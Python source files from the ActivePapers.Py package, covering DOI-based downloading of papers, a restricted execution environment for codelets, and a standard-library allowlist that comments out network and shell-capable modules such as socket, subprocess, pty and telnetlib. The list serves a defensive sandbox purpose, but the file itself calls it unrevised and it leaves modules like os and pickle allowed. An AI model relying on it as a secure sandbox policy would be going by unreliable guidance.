raise IOError(2, "No such ActivePaper: 'local:%s' (filename: %s)"
% (label, full_name))
def _get_figshare_doi(label, local_filename):
figshare_url = "http://api.figshare.com/v1/articles/%s" % label
try:
response = url.urlopen(figshare_url)
json_data = response.read().decode("utf-8")
except url.HTTPError:
raise ValueError("Not a figshare DOI: %s" % label)
article_details = json.loads(json_data)
download_url = article_details['items'][0]['files'][0]['download_url']
url.urlretrieve(download_url, local_filename)
return local_filename
def _get_zenodo_doi(label, local_filename):
try:
# Python 2
from HTMLParser import HTMLParser
bytes2text = lambda x: x
except ImportError:
# Python 3
from html.parser import HTMLParser
def bytes2text(b):
return b.decode(encoding="utf8")
class ZenodoParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == "link":
attrs = dict(attrs)
if attrs.get("rel") == "alternate" \
and attrs.get("type") != "application/rss+xml":
self.link_href = attrs.get("href")
self.link_type = attrs.get("type")
zenodo_url = "http://dx.doi.org/" + label
parser = ZenodoParser()
source = url.urlopen(zenodo_url)
try:
parser.feed(bytes2text(source.read()))
finally:
source.close()
assert parser.link_type == "application/octet-stream"
download_url = parser.link_href
url.urlretrieve(download_url, local_filename)
return local_filename
def _get_doi(label):
local_filename = os.path.join(library[0], label + ".ap")
if os.path.exists(local_filename):
return local_filename
dir_name = os.path.join(library[0], label.split("/")[0])
if not os.path.exists(dir_name):
os.mkdir(dir_name)
# There doesn't seem to be a way to download an
# arbitrary digital object through its DOI. We know
# know how to do it for figshare and Zenodo, which are
# each handled by specialized code.
# Figshare
if 'figshare' in label:
return _get_figshare_doi(label, local_filename)
# Zenodo
elif 'zenodo' in label:
return _get_zenodo_doi(label, local_filename)
# Nothing else works for now
else:
raise ValueError("Unrecognized DOI: %s" % label)
def _get_file_in_cwd(label):
filename = label + '.ap'
full_name = os.path.abspath(os.path.join(os.getcwd(), filename))
if os.path.exists(full_name):
return full_name
raise IOError(2, "No such ActivePaper: 'cwd:%s' (filename: %s)"
% (label, full_name))
download_handlers = {'local': _get_local_file,
'doi': _get_doi,
'cwd': _get_file_in_cwd}
def find_in_library(paper_ref):
ref_type, label = split_paper_ref(paper_ref)
handler = download_handlers.get(ref_type)
assert handler is not None
return handler(label) | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/library.py | library.py |
import imp
import collections
import os
import sys
import threading
import traceback
import weakref
import logging
import h5py
import numpy as np
import activepapers.utility
from activepapers.utility import ascii, utf8, isstring, execcode, \
codepath, datapath, path_in_section, owner, \
datatype, language, \
timestamp, stamp, ms_since_epoch
import activepapers.standardlib
#
# A codelet is a Python script inside a paper.
#
# Codelets come in several varieties:
#
# - Calclets can only access datasets inside the paper.
# Their computations are reproducible.
#
# - Importlets create datasets in the paper based on external resources.
# Their results are not reproducible, and in general they are not
# executable in a different environment. They are stored as documentation
# and for manual re-execution.
#
class Codelet(object):
def __init__(self, paper, node):
self.paper = paper
self.node = node
self._dependencies = None
assert node.name.startswith('/code/')
self.path = node.name
def dependency_attributes(self):
if self._dependencies is None:
return {'ACTIVE_PAPER_GENERATING_CODELET': self.path}
else:
deps = list(self._dependencies)
deps.append(ascii(self.path))
deps.sort()
return {'ACTIVE_PAPER_GENERATING_CODELET': self.path,
'ACTIVE_PAPER_DEPENDENCIES': deps}
def add_dependency(self, dependency):
pass
def owns(self, node):
return owner(node) == self.path
def _open_file(self, path, mode, encoding, section):
if path.startswith(os.path.expanduser('~')):
# Catch obvious attempts to access real files
# rather than internal ones.
raise IOError((13, "Permission denied: '%s'" % path))
path = path_in_section(path, section)
if not path.startswith('/'):
path = section + '/' + path
f = self.paper.open_internal_file(path, mode, encoding, self)
f._set_attribute_callback(self.dependency_attributes)
if mode[0] == 'r':
self.add_dependency(f._ds.name)
return f
def open_data_file(self, path, mode='r', encoding=None):
return self._open_file(path, mode, encoding, '/data')
def open_documentation_file(self, path, mode='r', encoding=None):
return self._open_file(path, mode, encoding, '/documentation')
def exception_traceback(self):
from traceback import extract_tb, print_exc
import sys
tb = sys.exc_info()[2]
node, line, fn_name, _ = extract_tb(tb, limit=2)[1]
paper_id, path = node.split(':')
return CodeFile(self.paper, self.paper.file[path]), line, fn_name
def _run(self, environment):
logging.info("Running %s %s"
% (self.__class__.__name__.lower(), self.path))
self.paper.remove_owned_by(self.path)
# A string uniquely identifying the paper from which the
# calclet is called. Used in Importer.
script = utf8(self.node[...].flat[0])
script = compile(script, ':'.join([self.paper._id(), self.path]), 'exec')
self._contents_module = imp.new_module('activepapers.contents')
self._contents_module.data = DataGroup(self.paper, None,
self.paper.data_group, self)
self._contents_module.code = CodeGroup(self.paper,
self.paper.code_group)
self._contents_module.open = self.open_data_file
self._contents_module.open_documentation = self.open_documentation_file
self._contents_module.snapshot = self.paper.snapshot
self._contents_module.exception_traceback = self.exception_traceback
# The remaining part of this method is not thread-safe because
# of the way the global state in sys.modules is modified.
with codelet_lock:
try:
codelet_registry[(self.paper._id(), self.path)] = self
for name, module in self.paper._local_modules.items():
assert name not in sys.modules
sys.modules[name] = module
sys.modules['activepapers.contents'] = self._contents_module
execcode(script, environment)
finally:
del codelet_registry[(self.paper._id(), self.path)]
self._contents_module = None
if 'activepapers.contents' in sys.modules:
del sys.modules['activepapers.contents']
for name, module in self.paper._local_modules.items():
del sys.modules[name]
codelet_lock = threading.Lock()
#
# Importlets are run in the normal Python environment, with in
# addition access to the special module activepapers.contents.
#
# All data generation is traced during importlet execution in order to
# build the dependency graph.
#
# Importlets are be allowed to read dataset except those they
# generated themselves. This is not enforced at the moment.
#
class Importlet(Codelet):
def run(self):
environment = {'__builtins__': activepapers.utility.builtins.__dict__}
self._run(environment)
def track_and_check_import(self, module_name):
return
#
# Calclets are run in a restricted execution environment:
# - many items removed from __builtins__
# - modified __import__ for tracking and verifying imports
# - an import hook for accessing modules stored in the paper
#
# All data access and data generation is traced during calclet
# execution in order to build the dependency graph.
#
class Calclet(Codelet):
def run(self):
self._dependencies = set()
environment = {'__builtins__':
activepapers.utility.ap_builtins.__dict__}
self._run(environment)
def add_dependency(self, dependency):
assert isinstance(self._dependencies, set)
self._dependencies.add(ascii(dependency))
def track_and_check_import(self, module_name):
if module_name == 'activepapers.contents':
return
node = self.paper.get_local_module(module_name)
if node is None:
top_level = module_name.split('.')[0]
if top_level not in self.paper.dependencies \
and top_level not in activepapers.standardlib.allowed_modules \
and top_level not in ['numpy', 'h5py']:
raise ImportError("import of %s not allowed" % module_name)
else:
if datatype(node) != "module":
node = node.get("__init__", None)
if node is not None and node.in_paper(self.paper):
self.add_dependency(node.name)
#
# The attrs attribute of datasets and groups is wrapped
# by a class that makes the attributes used by ACTIVE_PAPERS
# invisible to calclet code.
#
class AttrWrapper(collections.MutableMapping):
def __init__(self, node):
self._node = node
@classmethod
def forbidden(cls, key):
return isstring(key) and key.startswith('ACTIVE_PAPER')
def __len__(self):
return len([k for k in self._node.attrs
if not AttrWrapper.forbidden(k)])
def __iter__(self):
for k in self._node.attrs:
if not AttrWrapper.forbidden(k):
yield k
def __contains__(self, item):
if AttrWrapper.forbidden(item):
return False
return item in self._node.attrs
def __getitem__(self, item):
if AttrWrapper.forbidden(item):
raise KeyError(item)
return self._node.attrs[item]
def __setitem__(self, item, value):
if AttrWrapper.forbidden(item):
raise ValueError(item)
self._node.attrs[item] = value
def __delitem__(self, item):
if AttrWrapper.forbidden(item):
raise KeyError(item)
del self._node.attrs[item]
#
# Datasets are wrapped by a class that traces all accesses for
# building the dependency graph.
#
class DatasetWrapper(object):
def __init__(self, parent, ds, codelet):
self._parent = parent
self._node = ds
self._codelet = codelet
self.attrs = AttrWrapper(ds)
self.ref = ds.ref
@property
def parent(self):
return self._parent
def __len__(self):
return len(self._node)
def __getitem__(self, item):
return self._node[item]
def __setitem__(self, item, value):
self._node[item] = value
stamp(self._node, "data", self._codelet.dependency_attributes())
def __getattr__(self, attr):
return getattr(self._node, attr)
def read_direct(dest, source_sel=None, dest_sel=None):
return self._node.read_direct(dest, source_sel, dest_sel)
def resize(self, size, axis=None):
self._node.resize(size, axis)
stamp(self._node, "data", self._codelet.dependency_attributes())
def write_direct(source, source_sel=None, dest_sel=None):
self._node.write_direct(source, source_sel, dest_sel)
stamp(self._node, "data", self._codelet.dependency_attributes())
def __repr__(self):
codelet = owner(self._node)
if codelet is None:
owned = ""
else:
owned = " generated by %s" % codelet
lines = ["Dataset %s%s" % (self._node.name, owned)]
nelems = np.product(self._node.shape)
if nelems < 100:
lines.append(str(self._node[...]))
else:
lines.append("shape %s, dtype %s"
% (repr(self._node.shape), str(self._node.dtype)))
return "\n".join(lines)
#
# DataGroup is a wrapper class for the "data" group in a paper.
# The wrapper traces access and creation of subgroups and datasets
# for building the dependency graph. It also maintains the illusion
# that the data subgroup is all there is in the HDF5 file.
#
class DataGroup(object):
def __init__(self, paper, parent, h5group, codelet, data_item=None):
self._paper = paper
self._parent = parent if parent is not None else self
self._node = h5group
self._codelet = codelet
self._data_item = data_item
if self._data_item is None and datatype(h5group) == "data":
self._data_item = self
self.attrs = AttrWrapper(h5group)
self.ref = h5group.ref
self.name = h5group.name
@property
def parent(self):
return self._parent
def _wrap_and_track_dependencies(self, node):
ap_type = datatype(node)
if ap_type == 'reference':
from activepapers.storage import dereference
paper, node = dereference(node)
if node.name.startswith('/data/'):
node = paper.data[node.name[6:]]
elif isinstance(node, h5py.Group):
node = DataGroup(paper, None, node, None, None)
else:
node = DatasetWrapper(None, node, None)
else:
if self._codelet is not None:
if ap_type is not None and ap_type != "group":
self._codelet.add_dependency(node.name
if self._data_item is None
else self._data_item.name)
codelet = owner(node)
if codelet is not None \
and datatype(self._node[codelet]) == "calclet":
self._codelet.add_dependency(codelet)
if isinstance(node, h5py.Group):
node = DataGroup(self._paper, self, node,
self._codelet, self._data_item)
else:
node = DatasetWrapper(self, node, self._codelet)
return node
def _stamp_new_node(self, node, ap_type):
if self._data_item:
stamp(self._data_item._node, "data",
self._codelet.dependency_attributes())
else:
stamp(node, ap_type, self._codelet.dependency_attributes())
def __len__(self):
return len(self._node)
def __iter__(self):
for x in self._node:
yield x
def __getitem__(self, path_or_ref):
if isstring(path_or_ref):
path = datapath(path_or_ref)
else:
path = self._node[path_or_ref].name
assert path.startswith('/data')
path = path.split('/')
if path[0] == '':
# datapath() ensures that path must start with
# ['', 'data'] in this case. Move up the parent
# chain to the root of the /data hierarchy.
path = path[2:]
node = self
while node is not node.parent:
node = node.parent
else:
node = self
for element in path:
node = node._wrap_and_track_dependencies(node._node[element])
return node
def get(self, path, default=None):
try:
return self[path]
except KeyError:
return default
def __setitem__(self, path, value):
path = datapath(path)
needs_stamp = False
if isinstance(value, (DataGroup, DatasetWrapper)):
value = value._node
else:
needs_stamp = True
self._node[path] = value
if needs_stamp:
node = self._node[path]
stamp(node, "data", self._codelet.dependency_attributes())
def __delitem__(self, path):
test = self._node[datapath(path)]
if owner(test) == self._codelet.path:
del self._node[datapath(path)]
else:
raise ValueError("%s trying to remove data created by %s"
% (str(self._codelet.path), str(owner(test))))
def create_group(self, path):
group = self._node.create_group(datapath(path))
self._stamp_new_node(group, "group")
return DataGroup(self._paper, self, group,
self._codelet, self._data_item)
def require_group(self, path):
group = self._node.require_group(datapath(path))
self._stamp_new_node(group, "group")
return DataGroup(self._paper, self, group,
self._codelet, self._data_item)
def mark_as_data_item(self):
stamp(self._node, "data", self._codelet.dependency_attributes())
self._data_item = self
def create_dataset(self, path, *args, **kwargs):
ds = self._node.create_dataset(datapath(path), *args, **kwargs)
self._stamp_new_node(ds, "data")
return DatasetWrapper(self, ds, self._codelet)
def require_dataset(self, path, *args, **kwargs):
ds = self._node.require_dataset(datapath(path), *args, **kwargs)
self._stamp_new_node(ds, "data")
return DatasetWrapper(self, ds, self._codelet)
def visit(self, func):
self._node.visit(func)
def visititems(self, func):
self._node.visititems(func)
def copy(source, dest, name=None):
raise NotImplementedError("not yet implemented")
def flush(self):
self._paper.flush()
def __repr__(self):
codelet = owner(self._node)
if codelet is None:
owned = ""
else:
owned = " generated by %s" % codelet
items = list(self._node)
if not items:
lines = ["Empty group %s%s" % (self._node.name, owned)]
else:
lines = ["Group %s%s containing" % (self._node.name, owned)]
lines.extend(" "+i for i in items)
return "\n".join(lines)
#
# CodeGroup is a wrapper class for the "code" group in a paper.
# The wrapper provide read-only access to codelets and modules.
#
class CodeGroup(object):
def __init__(self, paper, node):
self._paper = paper
self._node = node
def __len__(self):
return len(self._node)
def __iter__(self):
for x in self._node:
yield x
def __getitem__(self, path_or_ref):
if isstring(path_or_ref):
path = codepath(path_or_ref)
else:
path = self._node[path_or_ref].name
assert path.startswith('/code')
node = self._node[path]
if isinstance(node, h5py.Group):
return CodeGroup(self._paper, node)
else:
return CodeFile(self._paper, node)
def __repr__(self):
return "<CodeGroup %s>" % self._node.name
class CodeFile(object):
def __init__(self, paper, node):
self._paper = paper
self._node = node
self.type = datatype(node)
self.language = language(node)
self.name = node.name
self.code = utf8(node[...].flat[0])
def __repr__(self):
return "<%s %s (%s)>" % (self.type, self.name, self.language)
#
# Initialize a paper registry that permits finding a paper
# object through a unique id stored in the codelet names,
# and a codelet registry for retrieving active codelets.
#
paper_registry = weakref.WeakValueDictionary()
codelet_registry = weakref.WeakValueDictionary()
#
# Identify calls from inside a codelet in order to apply
# the codelet-specific import rules.
#
def get_codelet_and_paper():
"""
:returns: the codelet from which this function was called,
and the paper containing it. Both values are None
if there is no codelet in the call chain.
"""
# Get the name of the source code file of the current
# module, which is also the module containing the Codelet class.
this_module = __file__
if os.path.splitext(this_module)[1] in ['.pyc', '.pyo']:
this_module = this_module[:-1]
# Get call stack minus the last entry, which is the
# method find_module itself.
stack = traceback.extract_stack()[:-1]
# Look for the entry corresponding to Codelet.run()
in_codelet = False
for filename, line_no, fn_name, command in stack:
if filename == this_module \
and command == "execcode(script, environment)":
in_codelet = True
if not in_codelet:
return None, None
# Look for an entry corresponding to codelet code.
# Extract its paper_id and use it to look up the paper
# in the registry.
for item in stack:
module_ref = item[0].split(':')
if len(module_ref) != 2:
# module_ref is a real filename
continue
paper_id, codelet = module_ref
if not codelet.startswith('/code'):
# module_ref is something other than a paper:codelet combo
return None, None
return codelet_registry.get((paper_id, codelet), None), \
paper_registry.get(paper_id, None)
return None, None
#
# Install an importer for accessing Python modules inside papers
#
class Importer(object):
def find_module(self, fullname, path=None):
codelet, paper = get_codelet_and_paper()
if paper is None:
return None
node = paper.get_local_module(fullname)
if node is None:
# No corresponding node found
return None
is_package = False
if node.is_group():
# Node is a group, so this should be a package
if '__init__' not in node:
# Not a package
return None
is_package = True
node = node['__init__']
if datatype(node) != "module" \
or ascii(node.attrs.get("ACTIVE_PAPER_LANGUAGE", "")) != "python":
# Node found but is not a Python module
return None
return ModuleLoader(paper, fullname, node, is_package)
class ModuleLoader(object):
def __init__(self, paper, fullname, node, is_package):
self.paper = paper
self.fullname = fullname
self.node = node
# Python 3.4 has special treatment for loaders that
# have an attribute 'is_package'.
self._is_package = is_package
def load_module(self, fullname):
assert fullname == self.fullname
if fullname in sys.modules:
module = sys.modules[fullname]
loader = getattr(module, '__loader__', None)
if isinstance(loader, ModuleLoader):
assert loader.paper is self.paper
return module
code = compile(ascii(self.node[...].flat[0]),
':'.join([self.paper._id(), self.node.name]),
'exec')
module = imp.new_module(fullname)
module.__file__ = os.path.abspath(self.node.file.filename) + ':' + \
self.node.name
module.__loader__ = self
if self._is_package:
module.__path__ = []
module.__package__ = fullname
else:
module.__package__ = fullname.rpartition('.')[0]
sys.modules[fullname] = module
self.paper._local_modules[fullname] = module
try:
execcode(code, module.__dict__)
except:
del sys.modules[fullname]
del self.paper._local_modules[fullname]
raise
return module
sys.meta_path.insert(0, Importer())
#
# Install an import hook for intercepting imports from codelets
#
standard__import__ = __import__
def ap__import__(*args, **kwargs):
codelet, paper = get_codelet_and_paper()
if codelet is not None:
codelet.track_and_check_import(args[0])
return standard__import__(*args, **kwargs)
activepapers.utility.ap_builtins.__import__ = ap__import__ | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/execution.py | execution.py |
# The following is a complete list of modules in the standard library,
# obtained from an installation of Python 2.7.3. Only modules starting
# with an underscore were removed. Forbidden modules are commented out.
# The selection needs a more careful revision.
allowed_modules = [
#"BaseHTTPServer",
"Bastion",
#"CGIHTTPServer",
"ConfigParser",
"Cookie",
#"DocXMLRPCServer",
"HTMLParser",
"MimeWriter",
"Queue",
#"SimpleHTTPServer",
#"SimpleXMLRPCServer",
#"SocketServer",
"StringIO",
"UserDict",
"UserList",
"UserString",
"abc",
"aifc",
#"antigravity",
#"anydbm",
#"argparse",
#"ast",
"asynchat",
"asyncore",
"atexit",
#"audiodev",
"base64",
#"bdb",
"binhex",
"bisect",
#"bsddb",
#"cProfile",
"calendar",
#"cgi",
#"cgitb",
"chunk",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"commands",
"compileall",
"compiler",
"config",
"contextlib",
"cookielib",
"copy",
"copy_reg",
"csv",
#"ctypes",
#"curses",
#"dbhash",
"decimal",
"difflib",
"dircache",
#"dis",
#"distutils",
#"doctest",
#"dumbdbm",
#"dummy_thread",
#"dummy_threading",
#"email",
"encodings",
#"filecmp",
#"fileinput",
"fnmatch",
"formatter",
"fpformat",
"fractions",
#"ftplib",
"functools",
"genericpath",
#"getopt",
#"getpass",
"gettext",
#"glob",
#"gzip",
"hashlib",
"heapq",
"hmac",
"hotshot",
"htmlentitydefs",
"htmllib",
#"httplib",
#"idlelib",
"ihooks",
#"imaplib",
"imghdr",
#"importlib",
#"imputil",
"inspect",
"io",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
#"mailbox",
#"mailcap",
"markupbase",
"md5",
"mhlib",
"mimetools",
"mimetypes",
"mimify",
#"modulefinder",
"multifile",
#"multiprocessing",
#"mutex",
#"netrc",
"new",
#"nntplib",
#"ntpath",
#"nturl2path",
"numbers",
"opcode",
"optparse",
"os",
#"os2emxpath",
#"pdb.doc",
#"pdb",
"pickle",
"pickletools",
"pipes",
"pkgutil",
"plistlib",
"popen2",
"poplib",
"posixfile",
"posixpath",
"pprint",
"profile",
"pstats",
#"pty",
"py_compile",
"pyclbr",
#"pydoc",
#"pydoc_data",
"quopri",
"random",
"re",
"repr",
"rexec",
"rfc822",
"rlcompleter",
"robotparser",
"runpy",
"sched",
"sets",
"sgmllib",
"sha",
"shelve",
"shlex",
"shutil",
#"site",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"sqlite3",
"sre",
"sre_compile",
"sre_constants",
"sre_parse",
#"ssl",
#"stat",
#"statvfs",
"string",
"stringold",
"stringprep",
"struct",
#"subprocess",
#"sunau",
#"sunaudio",
"symbol",
"symtable",
"sysconfig",
"tabnanny",
#"tarfile",
#"telnetlib",
"tempfile",
"test",
"textwrap",
#"this",
#"threading",
"timeit",
"token",
"tokenize",
#"trace",
#"traceback",
"tty",
"types",
#"unittest",
#"urllib",
#"urllib2",
"urlparse",
"user",
"uu",
#"uuid",
"warnings",
#"wave",
"weakref",
#"webbrowser",
#"whichdb",
"wsgiref",
"xdrlib",
"xml",
"xmllib",
"xmlrpclib",
"zipfile",
## extension modules
#"OSATerminology",
"array",
#"audioop",
#"autoGIL",
"binascii",
#"bsddb185",
"bz2",
"cPickle",
"cStringIO",
"cmath",
"crypt",
"datetime",
#"dbm",
#"fcntl",
#"future_builtins",
#"gdbm",
#"gestalt",
#"grp",
#"icglue",
"itertools",
"math",
#"mmap",
"nis",
"operator",
"parser",
"pyexpat",
#"readline",
#"resource",
#"select",
"strop",
#"syslog",
#"termios",
"time",
"unicodedata",
"zlib",
] | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/standardlib2.py | standardlib2.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.